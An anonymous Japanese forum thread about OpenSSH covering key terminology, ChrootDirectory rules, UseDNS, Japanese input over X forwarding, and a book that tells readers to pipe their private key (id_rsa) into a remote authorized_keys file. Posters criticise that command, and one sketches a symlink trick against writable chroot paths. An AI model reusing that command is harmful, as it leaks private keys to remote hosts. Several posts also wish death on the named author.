14/04/30 10:50:51.32 .net
>>30
>>23
34:名無しさん@お腹いっぱい。
14/04/30 12:08:31.64 .net
>>33
「公開鍵暗号を暗号化/復号に使うと思い込んでたのはスライド書いた奴だから」
スライドのどこで、それが分かる?
p10 は「秘密鍵/公開鍵」という用語を鍵ペア(データ)のどちらか一方という意味と
それをファイル(文字列)化したものという意味の二つの使い方を同じページで
使ってるのがまずいと思う。
2行目の「秘密鍵からは公開鍵が生成できる」は「いわゆる秘密鍵ファイルには
公開鍵情報も含まれているので、公開鍵情報を取り出せる」という意味だろう。
好意的に解釈すれば。
このスライドを書いた奴は分かってないはず、という見地に立てば、秘密鍵ファイルから
公開鍵を取り出せることを、秘密鍵から公開鍵が生成できると勘違いしているともとれるが。
p11の「公開鍵で制限出来ること」というタイトルに対して「公開鍵認証で出来る事」という案を出しているけど
このページの話題は openssh の sshd の実装の話(他のsshサーバーでもこうなのかどうかは知らないので
間違ってたらごめんだけど)だから、誤りというほどではないと思う。
35:名無しさん@お腹いっぱい。
14/04/30 14:29:27.08 .net
用語の使い方に「怪しい」ところがある、ということなら
初心者には勧められない、ということになると思う
ちゃんと自分で解釈を脳内補完できる人には
多少の「誤解を招きかねない」表現も問題ないだろうが
件のドキュメントはそれができない人向けなんじゃ?
36:名無しさん@お腹いっぱい。
14/04/30 14:33:19.49 .net
厳密に書こうとすると無闇にややこしくなっちゃって
初心者にわかりづらくなることもあるよね
37:名無しさん@お腹いっぱい。
14/04/30 15:09:13.09 .net
>>34
> p10 は「秘密鍵/公開鍵」という用語を鍵ペア(データ)のどちらか一方という意味と
> それをファイル(文字列)化したものという意味の二つの使い方を同じページで
> 使ってるのがまずいと思う。
秘密鍵を格納したファイルから公開鍵を取り出す事を「秘密鍵からは公開鍵が
生成できる」と表現したのなら、公開の場で発表する能力が無いって事だ。
38:名無しさん@お腹いっぱい。
14/04/30 15:12:15.45 .net
恨みでもあるの?
39:名無しさん@お腹いっぱい。
14/04/30 15:27:24.30 .net
>>35
もくじを見ると件のページは、おさらいの一部になっている。
ということは自分で脳内補完できる人向けじゃないだろうか。
40:名無しさん@お腹いっぱい。
14/04/30 16:42:53.53 .net
>>38
ウソを拡大再生産する輩を全部憎んでいる
死ねばいいのに
41:名無しさん@お腹いっぱい。
14/04/30 16:54:30.43 .net
間違いは正しましょう。
人は許しましょう。
42:名無しさん@お腹いっぱい。
14/04/30 16:58:36.41 .net
>>40
>>25
43:名無しさん@お腹いっぱい。
14/04/30 17:33:31.79 .net
>>42
じゃ、お前が教えてやれ。俺は叩く。
44:名無しさん@お腹いっぱい。
14/04/30 17:41:08.48 .net
>>43
おれは君ほど知識ないから。
45:名無しさん@お腹いっぱい。
14/04/30 19:43:47.34 .net
コメントなりtwitterなりで指摘しないと
ここで叩いても気づかないんじゃないかな?
個人的には叩くほどのことじゃない気はする
46:名無しさん@お腹いっぱい。
14/04/30 20:27:46.58 .net
アカウントないのでコメントできません。
47:名無しさん@お腹いっぱい。
14/04/30 21:26:15.15 .net
作ればいいのよ。
48:名無しさん@お腹いっぱい。
14/04/30 22:16:54.82 .net
>>47
それがイヤだから2chにいるの
49:名無しさん@お腹いっぱい。
14/04/30 23:25:32.54 .net
RSAの場合、2つの素数p, q(p≠q)に対し(p,q)を秘密鍵, pqを公開鍵にするのだから秘密鍵から公開鍵を生成するのは簡単だよね?
50:名無しさん@お腹いっぱい。
14/05/01 00:08:19.46 .net
>>49
id_rsaにmodules nとpublicExponent eが含まれてるから。
RFC 3447 PKCS #1: RSA Cryptography Specifications February 2003
A.1.2 RSA private key syntax
An RSA private key should be represented with the ASN.1 type
RSAPrivateKey:
RSAPrivateKey ::= SEQUENCE {
version Version,
modulus INTEGER, -- n
publicExponent INTEGER, -- e
privateExponent INTEGER, -- d
prime1 INTEGER, -- p
prime2 INTEGER, -- q
exponent1 INTEGER, -- d mod (p-1)
exponent2 INTEGER, -- d mod (q-1)
coefficient INTEGER, -- (inverse of q) mod p
otherPrimeInfos OtherPrimeInfos OPTIONAL
}
51:名無しさん@お腹いっぱい。
14/05/01 16:45:46.77 .net
いつまでこの話題引っ張るの?
52:名無しさん@お腹いっぱい。
14/05/01 16:49:20.51 .net
>>11があきらめるまで。
53:名無しさん@お腹いっぱい。
14/05/01 19:52:54.74 .net
引っ張ってるのはオレじゃない。必死でSSH力を擁護してる誰か。
54:名無しさん@お腹いっぱい。
14/05/01 21:06:13.64 .net
それに反応してるなら同罪。
55:名無しさん@お腹いっぱい。
14/05/01 23:32:05.54 .net
賢者timeな者だけが石を投げなさい(冗談
sshに限らず、ツールの100%も使いこなせていないなー
56:名無しさん@お腹いっぱい。
14/05/01 23:47:20.91 .net
OpenSSHのsshd_configでChrootDirectoryを指定することってあるよね。
そのディレクトリに、
All components of the pathname must be root-owned directories that are not writable by any other user or group.
こういう制限があるけど、ナンデ?
57:55
14/05/01 23:54:48.41 .net
特権分離では?
58:名無しさん@お腹いっぱい。
14/05/02 00:24:56.67 .net
>>56
rootの設定と関係なしにlnとかで好きな場所に出来てしまうからじゃ?
59:名無しさん@お腹いっぱい。
14/05/02 01:28:27.26 .net
ChrootDirectoryの親まではroot-ownedでroot以外not writableという制限は分かるような気がするんだけど、
例えば、chroot先を/home/oresama/ に指定するとき oresama がroot以外not writableになってると
oresamaは自分のホームディレクトリのはずなのにディレクトリもファイルも作れない。
ちょっと厳しくないかと思う。
60:名無しさん@お腹いっぱい。
14/05/02 01:37:37.96 .net
>>58
「あのぉ、root先輩、ChrootDirectoryを /home/watashi/dakeno/himitsu/ にしてもらえませんかぁ。」って頼んで
「おっふ、やっといた」となったら
rmdir /home/watashi/dakeno/himitsu
ln -s /root /home/watashi/dakeno/himitsu
「計画通~り」ってことだよね。
このためには/home/watashi/dakeno がwritableでなければ出来ないでしょ。
himitsu は writableでもかまわないんじゃないだろうか。
61:名無しさん@お腹いっぱい。
14/05/02 02:16:52.55 .net
>>60
Chrootにつっこまれる他のユーザを騙すことはできるようになるな
62:名無しさん@お腹いっぱい。
14/05/02 08:37:42.29 .net
>>59
/etc/shadowとか自由に作れるがそれでいいのか?
63:名無しさん@お腹いっぱい。
14/05/02 11:33:29.13 .net
そっか、mv して新しく作ることが可能になるのか。
いくない。それは、いくないな。
64:名無しさん@お腹いっぱい。
14/05/02 13:58:00.45 .net
>>59
あんま詳しくないけど、chroot先とホームディレクトリは別々じゃなかったけ?
65:名無しさん@お腹いっぱい。
14/05/02 14:16:39.82 .net
OpenSSH No Longer Has To Depend On OpenSSL - Slashdot
URLリンク(beta.slashdot.org)
試してみたい
66:名無しさん@お腹いっぱい。
14/06/01 20:18:44.75 .net
VPN経由でSSHって使えないの?
67:名無しさん@お腹いっぱい。
14/06/01 23:32:48.58 .net
>>66
何か使えない理由ある?
68:名無しさん@お腹いっぱい。
14/06/02 02:05:58.72 .net
宗教上の理由とか。
69:名無しさん@お腹いっぱい。
14/06/02 08:26:24.30 .net
中国とかは法律的な理由もあるかも
暗号化通信は当局が解読可能な状態にしないと駄目なんだっけ?
VPN張る事自体問題視されるとか聞いたことあるけど
70:名無しさん@お腹いっぱい。
14/06/02 09:52:55.95 .net
それ>>66とは別の話だよね。
71:名無しさん@お腹いっぱい。
14/09/14 17:08:34.71 .net
今SSHについて勉強してます。
どなたかRSA1、RSA、DSAの違いにつ
いて教えて頂けませんか?
メリット、デメリットがわからず、どれを使って良いのかわかりません。
自分で調べろやは無しでお願いします。
72:名無しさん@お腹いっぱい。
14/09/14 17:09:54.63 .net
挿入ネタはいいです
73:名無しさん@お腹いっぱい。
14/09/14 17:17:26.72 .net
挿入ねたって?
74:名無しさん@お腹いっぱい。
14/09/14 19:08:03.88 .net
>>71
shでも学んでろ。
532 名無しさん@お腹いっぱい。 sage 2014/09/14(日) 17:11:01.54
今シェルについて勉強してます。
どなたかash、bsh、cshの違いにつ
いて教えて頂けませんか?
メリット、デメリットがわからず、どれを使って良いのかわかりません。
自分で調べろやは無しでお願いします。
75:名無しさん@お腹いっぱい。
14/09/14 19:22:24.51 .net
>>74
なに(笑
このコピペみたいなカキコは!(笑)
お、俺じゃないんだからね
76:名無しさん@お腹いっぱい。
14/09/17 05:52:02.33 .net
みたいなじゃなくて改変コピペそのもの
こんなつまらんことを時々思い出したかのように繰り返してる狂人だからスルー推奨
77:名無しさん@お腹いっぱい。
14/09/17 06:35:04.81 .net
改変コピペ上等。全力で釣られるのが真の漢
78:名無しさん@お腹いっぱい。
14/09/17 10:46:58.43 .net
基地外本人乙
79:名無しさん@お腹いっぱい。
14/10/10 08:24:44.85 .net
# netstat -n | grep 22
したら、知らないホストでESTABLISHED接続になってて
# cat /var/log/secure| grep 知らないホスト(ロボット?)
から複数のアタックがあったのだけど、session openってログ無かったんですが、
ssh のセッションがESTABLISHEDになることってあるのでしょうか?
80:名無しさん@お腹いっぱい。
14/10/10 08:59:26.03 .net
catが無駄です
81:名無しさん@お腹いっぱい。
14/10/10 11:44:06.96 .net
>>79
あります
82:名無しさん@お腹いっぱい。
14/10/10 11:54:05.56 .net
>>79
tcpのセッションとsshのセッションを分けて考えないと。
83:名無しさん@お腹いっぱい。
14/10/10 13:28:43.78 .net
>>81, >>82
ありがとうございます。
/var/log/secureでsession openになってないので気にしなくていいのですね。
ポートNo変えようかなーと思ってます。
84:名無しさん@お腹いっぱい。
14/10/11 09:48:05.32 .net
>83 なんなら log をverbose にして暫く見張る。ま、port 番号変えるほうが対策になるけど。
85:名無しさん@お腹いっぱい。
14/10/11 16:18:08.65 .net
秘密鍵使ってて、sshポートのハッキングなんてあるえるのでしょうか。
86:名無しさん@お腹いっぱい。
14/10/11 17:07:57.77 .net
>>85
マスコミじゃないんだからクラッキングとか攻撃とか呼ぼうぜ。
回答:sshd自体に脆弱性があれば普通に吹っ飛ばされるよ。
URLリンク(jvndb.jvn.jp)
URLリンク(jvndb.jvn.jp)
URLリンク(jvndb.jvn.jp)
URLリンク(jvndb.jvn.jp)
87:名無しさん@お腹いっぱい。
14/10/11 18:17:34.19 .net
>>85
パスワード認証許可してないかノックしてるんだろ。
88:名無しさん@お腹いっぱい。
14/10/11 19:05:26.71 .net
>>85 とある共用鯖で、アホな鯖管がルート奪取脆弱性ありのカーネル放置していて、これまたよく分かってないユーザが、何人も公開鍵、秘密鍵を一遍に取られてえらいことになった、つう事案があったよ。
89:名無しさん@お腹いっぱい。
14/10/11 21:33:37.26 .net
「公開鍵を送ってくれ」と言ったら
秘密鍵も送ってくるユーザーの多いこと多いこと。
90:名無しさん@お腹いっぱい。
14/10/13 00:01:52.96 .net
そういうのは9割が中国からだから、
URLリンク(freetibet.org)
の中身を返すようにしてる
91:名無しさん@お腹いっぱい。
14/10/13 16:13:39.16 .net
>>90
coolですな。
92:名無しさん@お腹いっぱい。
14/10/14 04:44:30.79 .net
TCPラッパーが使えなくなると地味に困るなあ・・・
なんでサポート切っちゃうんでしょうか
93:名無しさん@お腹いっぱい。
14/10/14 17:23:56.12 .net
もしかしたら ifconfig みたいにメンテナがいないからじゃない?
ftp 覗いてみたら tcp_wrappers_7.6.tar.gz のタイムスタンプは Apr 8 1997 だった
94:名無しさん@お腹いっぱい。
14/10/14 17:28:46.50 .net
sshd -iでinetdから上げるようにしてinetdのtcpwrapperを使うかね
95:名無しさん@お腹いっぱい。
14/10/14 17:54:06.39 .net
inetdサポートもそのうち削られそうだ
96:名無しさん@お腹いっぱい。
14/10/14 19:42:41.99 .net
sshd_configのMatch AddressとDenyUsers, AllowUsersあたりでかわりにがんばれってことかなぁ
とりあえずはpf.confでやるけど
97:名無しさん@お腹いっぱい。
14/10/14 19:43:18.68 .net
リロードめんどいな
98:名無しさん@お腹いっぱい。
14/10/14 19:47:07.53 .net
PAMでやれ、ってことかな。
pam_accessとかpam_login_accessとか。
99:名無しさん@お腹いっぱい。
14/10/14 19:59:17.14 .net
参考
URLリンク(marc.info)
URLリンク(marc.info)
100:名無しさん@お腹いっぱい。
14/10/18 10:07:44.17 .net
誰か知ってたら教えて欲しいんだけど、UseDNSって何のために存在しているの?
manとか見るとクライアントのIPから逆引きでホスト名を確認して
IPアドレスとホスト名のマッピングが出来なかったら接続を許可しないって動きの
ようにみえるんだけど…
この辺の詳しい動きがよくわからん
101:名無しさん@お腹いっぱい。
14/10/18 11:02:42.57 .net
「逆引きまともに設定してないやつらなんて信用できるか!」
って人のために存在している。
102:名無しさん@お腹いっぱい。
14/10/18 11:03:43.55 .net
クライアントの IP アドレスを逆引きしてホスト名を得る
→そのホスト名を正引きして IP アドレスを得る
→その IP アドレスが元のと一致してなかったら蹴る
103:名無しさん@お腹いっぱい。
14/10/18 11:42:47.38 .net
そんなごく当たり前のIP逆引きチェックそのものを質問してるわけない、
質問の意図は別のところにある、と見るべき引っかけ問題。
104:名無しさん@お腹いっぱい。
14/10/18 12:39:10.85 .net
んじゃどんな意図なんだろ
105:名無しさん@お腹いっぱい。
14/10/18 12:52:20.85 .net
UseDNSをnoにすることってないのになぜオプションがあるのか、という質問?
IP解決はDNSとは限らない(NISとかhostsとか)のになぜDNSという設定名?
106:名無しさん@お腹いっぱい。
14/10/18 12:55:17.30 .net
逆引き出来ないクライアントから接続しているユーザーからの
「なんかログインに時間かかるんだけど」というクレームに
対応するため、逆引きをしないようにする機能だろ。
107:名無しさん@お腹いっぱい。
14/10/18 12:59:58.93 .net
「それは逆引き設定しろ」と言えば済む話で、sshdの設定を変えるべきではない。
108:名無しさん@お腹いっぱい。
14/10/18 13:08:08.17 .net
>>107
そう思う人はそうすればいい。
109:名無しさん@お腹いっぱい。
14/10/18 13:12:02.82 .net
釣りだったか。
110:名無しさん@お腹いっぱい。
14/10/18 13:13:29.54 .net
1ユーザーの逆引き無視要求で、全ユーザーの逆引きチェックを無効(危険)に晒すなんて、、
111:名無しさん@お腹いっぱい。
14/10/18 13:25:57.51 .net
逆引きチェックしてもあんまり意味ないと思う。
112:名無しさん@お腹いっぱい。
14/10/18 13:47:55.43 .net
ごめん、言葉が足らなかった。
このUseDNS、デフォルトだとYesになっていると思うんだけど、クライアントが逆引き出来ない状態
(DNSサーバへの接続が出来ない状態やそもそもレコードにIPが登録されていない状態)でもSSHって接続出来るじゃない?
だとしたら、どういう時に使えるの?と思って。
1.IPアドレスがDNSに登録されている状態
かつ
2.そのホスト名を再度正引きしたら違うIPアドレスになっている
上みたいな状態の時だけは接続させないって認識であってるのかな?
レコードにいなかったり、DNSに接続出来ない時はそのままSSH接続出来るって事はわかるんだけど…
113:名無しさん@お腹いっぱい。
14/10/18 17:52:52.87 .net
rhosts認証を突破されないためのオプションだよ。
114:名無しさん@お腹いっぱい。
14/10/18 20:43:50.93 .net
>>113
rhosts認証って、sshd_configのデフォルト設定だと有効になっていないよね?
てことは、sshd_configがデフォルトの状態のまま利用されていたら、このオプションでやってくれることってログの記録時にホスト名でロギングしてくれるくらいって
認識であっているかな?
他の何か利用用途ってあります?
115:名無しさん@お腹いっぱい。
14/10/18 23:12:07.86 .net
ホスト名でMatchさせてる場合
116:名無しさん@お腹いっぱい。
14/10/19 08:28:25.46 .net
考えてもしょうがないからさっさとnoにしちゃえよ
117:名無しさん@お腹いっぱい。
14/10/19 15:35:56.74 .net
>>116
> 考えてもしょうがないからさっさとnoにしちゃえよ
インシデントになったせいで、会議で説明しなきゃならないんだよ
118:名無しさん@お腹いっぱい。
14/10/19 16:35:04.00 .net
自分がやるべきことを掲示板に丸投げしてドヤ顔かよw
119:名無しさん@お腹いっぱい。
14/10/19 19:45:24.65 .net
ウソ教えられて、会議でそれを突っ込まれたら、2chで聞いたと言い訳するのかな?
120:名無しさん@お腹いっぱい。
14/10/19 20:27:25.16 .net
>>118
>>119
とはいっても、サポートよりここの住人の方が詳しいし頼りになるし…
教えてもらった情報を元に海外のサイトとサポートで裏取しようと思ってたんだ
仕様の部分がもうよくわからなくて…
121:名無しさん@お腹いっぱい。
14/10/19 22:46:30.26 .net
もうソース読んだ方が早いし確実じゃね。
122:名無しさん@お腹いっぱい。
14/10/19 23:12:00.13 .net
かまってもらえるのは回答者にとって興味がある場合だけ
123:名無しさん@お腹いっぱい。
14/10/20 02:45:14.37 .net
>>120
ホスト名で認証しない限りUseDNSはNoでいい。
今時IgnoreRhostsがnoになってることはないだろ。
デフォルトはrsh引きずってるだけ。
124:名無しさん@お腹いっぱい。
14/10/20 14:33:56.81 .net
かまうと調子こいてソースは?とかエビデンスは?とか言い始めるぞw
125:名無しさん@お腹いっぱい。
14/10/20 14:34:29.62 .net
なら>>121でよし。
126:名無しさん@お腹いっぱい。
14/10/21 17:09:45.04 .net
というわけで、このスレでのSSHに関する情報交換は全面禁止となりました。
127:名無しさん@お腹いっぱい。
14/10/21 18:21:36.12 .net
ログインシェルをsshに変えたいんですが、chshでやろうとするとエラーになります。
どうすればいいですか?
128:名無しさん@お腹いっぱい。
14/10/21 18:33:44.06 .net
まずはその屏風からsshとかいうシェルを出してみてください
129:名無しさん@お腹いっぱい。
14/10/21 18:38:38.21 .net
sshはすでにインストール済みで、動作確認済みです
130:名無しさん@お腹いっぱい。
14/10/21 18:45:40.37 .net
>>127
>>129
出来ません、出来ません。
SSHにはそんなこと出来ません。
131:名無しさん@お腹いっぱい。
14/10/21 19:11:18.03 .net
>>127
/etc/shellsにないんじゃないか。
ログインできなくなってもしらんけど。
132:名無しさん@お腹いっぱい。
14/10/21 19:24:07.55 .net
/etc/shellsですか、ありがとうございます。
今環境がないので明日、客先で試してみます。
133:名無しさん@お腹いっぱい。
14/10/21 19:32:19.94 .net
加齢臭コピペがくさいです
134:名無しさん@お腹いっぱい。
14/10/21 19:33:29.40 .net
>>126
× このスレでのSSHに関する情報交換は全面禁止となりました
○ このスレでのSSHに関するサポート乞食は全面禁止となりました
135:名無しさん@お腹いっぱい。
14/10/26 13:36:46.74 .net
その後 132 の姿を見る者は居なかった
136:名無しさん@お腹いっぱい。
14/10/26 21:06:55.48 .net
132=129=127なのか、ネタレスだったのかはしらんけど、
本気でそれを客先でやったらとんでも無い事にはなるだろうなぁ…
sudoも出来ない状況だと、hddを別のに刺して直すしか思いつかん。
137:名無しさん@お腹いっぱい。
14/10/26 21:30:38.39 .net
いつもの改変コピペ君だよ
138:名無しさん@お腹いっぱい。
14/10/27 14:20:34.23 .net
UNIX板には死語レベルのコピペにマジレスするピュア()な中高年が多いですね
139:名無しさん@お腹いっぱい。
14/11/23 17:53:17.21 .net
SSH で接続すると、日本語入力ができなくなるのだが、、これって無理なの?
Cygwin → LinuxMint
LinuxMint → LinuxMint(別ユーザー)
ターミナル または 、ssh -X で手元に表示したアプリでも日本語入力できない。
LinuxMint単独だと、 Mozcとかで日本語入力できてるんだけど。
140:名無しさん@お腹いっぱい。
14/11/24 04:27:36.36 .net
普通はできるだろ…とりあえず文字コード合ってる?
141:名無しさん@お腹いっぱい。
14/11/24 04:36:11.60 .net
できないじゃなくて、どうなるか書かないと。
142:名無しさん@お腹いっぱい。
14/11/24 05:16:14.38 .net
>>139
この場合日本語入力はローカル側のが使われるんだよ。sshログイン先のホストのものではない。
必要な環境変数が設定されてないとエスパー。
143:名無しさん@お腹いっぱい。
14/11/29 18:39:05.96 .net
>139-142
失礼しやした。
結論から言うと、リモート先で、
export XMODIFIERS="@im=fcitx"
と入力することによって、
GUIアプリ(Firefoxとかgvim)でも、日本語入力(Mozc)ができるようになりました。
で、後は、この export 文を設定ファイルで自動読み込みさせたい。
.bashrc に書くのはイマイチだし、
かといって、.ssh/rc に 書くと、
今度は、sshが、 xauth を読まなくなる。
これについては、
SSHのマニュアルか
URLリンク(www.unixuser.org)
個人ページ
URLリンク(namazu.org)
URLリンク(uncorrelated.no-ip.com)
を参考に対処できそう。
144:143
14/11/29 21:40:37.22 .net
自己レス
>>143
LinuxMint→LinuxMint へ、ssh -X でリモートログインした場合、
export XMODIFIERS="@im=fcitx"
すれば、gvim等のGUIアプリでも日本語入力のインターフェースが使えた。
だけど、~/.ssh/rc に記述すると xauth関連が良く分からないのであきらめ。
おとなしく、exportを手打ちするか、source することにした。
それから、
cygwin → LinuxMint へ ssh -X で リモートログインした場合は、
リモートの Xアプリ(gvim)にて、日本語入力インターフェースを使う方法が見つからなかった。
orz
145:名無しさん@お腹いっぱい。
14/11/30 04:07:35.69 .net
.xsession
146:名無しさん@お腹いっぱい。
14/11/30 09:01:56.33 .net
cat .ssh/id_rsa | ssh username@remotehost 'cat >> .ssh/authorized_keys; chmod 600 .ssh/authorized_keys'
これだと秘密鍵をremotehostに持ち出すことになるよね?
このあと特にエラーが出るわけでもないから初心者だと気づかないかも。
147:名無しさん@お腹いっぱい。
14/11/30 10:48:50.82 .net
なんで秘密キーを公開キーのファイルに追記してんの?w
148:名無しさん@お腹いっぱい。
14/11/30 10:54:42.92 .net
>>146
公開鍵登録しろよ。多分id_rsa.pub
149:名無しさん@お腹いっぱい。
14/12/01 10:23:39.78 .net
>>146
そんなやり方どこで聞いたんだ
150:名無しさん@お腹いっぱい。
14/12/01 11:04:16.75 .net
>>147-149
川本安武とかいうバカが元凶のようだ。
URLリンク(books.google.co.jp)
151:名無しさん@お腹いっぱい。
14/12/01 12:25:54.94 .net
「~/」を書かないんだな
152:名無しさん@お腹いっぱい。
14/12/01 15:20:31.53 .net
~/はシェルに依存だから。
>>や;も意図したとおりに解釈してくれないかも知れないが。
153:名無しさん@お腹いっぱい。
14/12/03 23:16:27.17 .net
~/ を解釈しないシェルって何だ?
dashもbusyboxのshも解釈するぞ
154:名無しさん@お腹いっぱい。
14/12/03 23:38:30.85 .net
純正シェル。~はcsh由来だよ。
155:名無しさん@お腹いっぱい。
14/12/04 00:06:43.07 .net
/bin/shがThompson ShellとかBourne ShellでOpenSSHが入ってる環境とか
無理やり作ろうとしても大変だなww
156:名無しさん@お腹いっぱい。
14/12/04 01:00:08.15 .net
商用UNIX環境で古いものだとそういうのもあるな
157:名無しさん@お腹いっぱい。
14/12/04 01:37:00.88 .net
うん、ありますね。
で、それをわざわざ使わせて
「~/ はこのシステムでは使えない、だからスクリプトを書く時は~/を使うな」
と教え込むんでしょうか?
158:名無しさん@お腹いっぱい。
14/12/04 02:02:22.75 .net
~ を解釈しないシェルで ~ を使ってしまう危険性より
ホームディレクトリ以外で >>150 のコマンドを実行してしまう危険性の方が高いんじゃないかな。
159:名無しさん@お腹いっぱい。
14/12/04 06:52:38.02 .net
>>158
ホームディレクトリで実行する方が危険だろ。
それ以外ならエラーで済む。
お前、川本とかいうバカ本人? まだわかって無いの?
何冊売れたか知らんけど、その記述を鵜呑みにした読者を危険に晒してるんだぞ。
死ねば?
160:名無しさん@お腹いっぱい。
14/12/04 07:44:13.26 .net
>>150 = >>159 はここで作者disる暇あったらgihyoに本の回収絶版でも申請すれば?
161:名無しさん@お腹いっぱい。
14/12/04 08:02:25.76 .net
正当な批判をdisってるとか。死ねば?
162:名無しさん@お腹いっぱい。
14/12/04 08:58:42.72 .net
だから訂正でも謝罪でも訴訟でもなく作者の死を望んで何になるのよ
163:名無しさん@お腹いっぱい。
14/12/04 09:10:17.44 .net
やっぱり川本本人か。w
164:名無しさん@お腹いっぱい。
14/12/04 09:51:36.60 .net
オッスオラ川本!
165:名無しさん@お腹いっぱい。
14/12/04 09:54:07.71 .net
とりあえずお前があの本以外から一切の情報を仕入れず、ネットで検証もせず
鵜呑みにしてやらかして逆切れしたことはわかった
166:名無しさん@お腹いっぱい。
14/12/04 09:56:28.68 .net
新山祐介さんの「入門OpenSSH」最強伝説がまた証明されてしまったな
URLリンク(www.unixuser.org)
おまえらネットも本も間違ってるから絶対に参考にするな
新山祐介さんの「入門OpenSSH」だけを参考にしろ
これ一冊あれば何もいらない
167:名無しさん@お腹いっぱい。
14/12/04 09:58:54.50 .net
「正当な批判」は作者と出版社に直接届けないと本人のためにならないぞ
URLリンク(gihyo.jp)
URLリンク(twitter.com)
168:名無しさん@お腹いっぱい。
14/12/04 10:55:15.15 .net
間違った記述すると、瞬殺で特定されるとかgoogleさん怖すぎ。
169:名無しさん@お腹いっぱい。
14/12/05 00:16:32.57 .net
>>165
161は160に死ねと言ってるのに162は作者に死ねといったと解釈した。
よって160=162=作者(というか筆者、川本)でなければ矛盾が生じるため、
「あの本以外から一切の情報を仕入れなかった被害者」である可能性を考慮する必要はない。
170:名無しさん@お腹いっぱい。
14/12/05 02:41:18.78 .net
>>169
著者に「死ねば」と言ったのは 159
171:名無しさん@お腹いっぱい。
14/12/05 08:28:31.97 .net
>>170
>>159は(川本かもしれない)>>158に「死ねば」と言った。
>>158が筆者であると断定できるのは>>158だけであるが、
お前は断定している。ゆえにお前が>>158であり川本本人。
172:名無しさん@お腹いっぱい。
14/12/05 08:46:18.64 .net
で、お前はこのスレで川本死ね川本死ねと呪詛を吐くだけで
他に被害者が出ないようになんとかしようという気は全く無いわけだ
>>167にある連絡先にクレームはちゃんとつけたのか?
173:名無しさん@お腹いっぱい。
14/12/05 10:48:45.50 .net
>>172
当たり前だ。タダでデバッグしてやる義理は無い。
174:名無しさん@お腹いっぱい。
14/12/05 15:58:44.63 .net
読者を危険に晒した!というほどのおおげさなことなん?
chmod 600してるからremotehostが共用だとしても本人以外の一般ユーザーからは見れないはずだし、
rootが信頼できないならsshすること自体が危ないわけだし。
scpしてchmodする直前のスキをつくというのはナシね。
物理的にハードディスクが強奪されるかrootアカウントがクラックされるかして、さらにパスフレーズのオフライン解析なんて、そこまでして狙われる初心者ってそんなにいるとも思えない。
175:名無しさん@お腹いっぱい。
14/12/05 17:09:10.53 .net
>>174
> rootが信頼できないならsshすること自体が危ないわけだし。
そうなの? どんな危険性が?
176:名無しさん@お腹いっぱい。
14/12/05 18:54:33.93 .net
>>174
> rootが信頼できないならsshすること自体が危ないわけだし。
別のサーバーも同じキーペアで認証してたら何が起こるか考えてみたまえ。
177:名無しさん@お腹いっぱい。
14/12/05 19:50:35.81 .net
>>175
キーロガー入りのログインシェルやカーネルに差し替えられてたらアウトじゃん?
178:名無しさん@お腹いっぱい。
14/12/05 22:19:24.59 .net
>>176
いや、問題ないよね? 秘密鍵のフォワードとかしてなければ
179:名無しさん@お腹いっぱい。
14/12/05 23:00:17.54 .net
cat .ssh/id_rsa
はタイプミスだろ。かなり痛いミスだけど。
やってることは公開鍵認証のベストプラクティスとしてじゃなくて、
公開鍵認証をするには .ssh/authorized_keys に公開鍵を追記しますよ、と言うのを説明するためにやってるだけでしょ。
アルゴリズムを説明するのに擬似コードで書いてあるようなものだろ。
180:名無しさん@お腹いっぱい。
14/12/05 23:21:07.02 .net
>>178
問題ないなら、お前の常用してる秘密鍵をここに貼り付けろよ。
181:名無しさん@お腹いっぱい。
14/12/06 00:00:58.57 .net
>>179
まぁどいつもこいつもわかってて弄ってるだけなので……
182:名無しさん@お腹いっぱい。
14/12/06 00:01:43.20 .net
>>180
ログイン先に秘密鍵おいておくとか頭煮えてるの? おだいじにね
183:名無しさん@お腹いっぱい。
14/12/06 00:09:57.17 .net
>>182
おれじゃなくて>>178に言え。痴呆症ジジイ。
184:名無しさん@お腹いっぱい。
14/12/06 02:42:15.93 .net
>>174
信用出来ない鯖という前提でsshするなら問題ない。
>>175
信用出来ない鯖にsshするついでにパスワード打ち込んだりエージェント転送しちゃう馬鹿には危険。
>>176
「sshすること自体が危ない」への反論ではなくさらなる危険の指摘だと思うけど、ちょっと言葉足らずだと思う。
>>177
信用出来ない鯖に保護したい情報打ち込んだりしないのでsshに脆弱性がなければ関係無いです。
ていうか脆弱性があってもそれを突く場合に差し替えるのはシェルやカーネルじゃなくsshdだろが。
>>178
176は「sshすること自体が危ない」への反論じゃなくて、アンカー先/引用部分が不適切なだけかと。
>>179
かなり痛いミスって指摘をいやそうじゃないってごねてるバカが居るように見える。
>>180>>183
問題がないのは公開鍵を信用出来ないrootの居る鯖に置く行為の事だろ、馬鹿。
公開鍵と秘密鍵の区別がつかないとか、これも川本とか言う馬鹿のレスなのかなぁ…
185:名無しさん@お腹いっぱい。
14/12/06 03:02:41.76 .net
>>177
キーロガーあろうが、渡したくない情報を入力しなければ何も問題ない。
ウェブサーバーがログ取ってるからアクセスするの危険と言ってるようなもの。そりゃクレジットカード情報送るとかなら危険。
クライアント側で何か実行とかできるのかと思った。
186:名無しさん@お腹いっぱい。
14/12/06 07:22:31.63 .net
>>184
>>>180>>183
>問題がないのは公開鍵を信用出来ないrootの居る鯖に置く行為の事だろ、馬鹿。
誤読だバカ。
>>176,>>180,>>183は全部オレだ。
「sshすること自体が危ない」ではなく「rootが信頼できないなら」への指摘だ。
言いがかりをつけるなら、どっちを引用したのか良く考えてからつけることだ。
187:名無しさん@お腹いっぱい。
14/12/06 16:04:33.63 .net
誤記のひとつくらいしょうがないでしょ。
いずれ正誤表くらい出るよ。
一部のミスをあげつらって不安を煽るよりも、技術者全体のsshスキル底上げのためにも、むしろひとりでも多くの初心者が一度目を通すべきと思う。
188:名無しさん@お腹いっぱい。
14/12/06 18:12:25.55 .net
>>187
不安を煽るというか、秘密鍵を意図せずアップロードする行為はどう考えても普通に危ないわw
正誤表が出ても初心者の類がそんなん見に行くわけがないし正誤表が出ても推奨なぞできん。
189:名無しさん@お腹いっぱい。
14/12/06 18:25:54.91 .net
IPAに届けた上で、技評のトップページで謝罪訂正するレベル
190:名無しさん@お腹いっぱい。
14/12/06 18:32:25.86 .net
だな
初心者がWebなんぞ見れるはずが無い
191:名無しさん@お腹いっぱい。
14/12/06 19:15:59.16 .net
>>188
>>189
>>190
取ったな。
鬼の首。
192:名無しさん@お腹いっぱい。
14/12/06 22:51:34.25 .net
>>191
取った(殺った)というか拾った程度な感じ。
首を落とした奴を崇め奉ってる奴が居るから鬼の首みたいな扱いになってるけど、
実際の所は路肩のゴミを拾った程度の話でしか無い。さっさと捨てよう、こんなの。
193:名無しさん@お腹いっぱい。
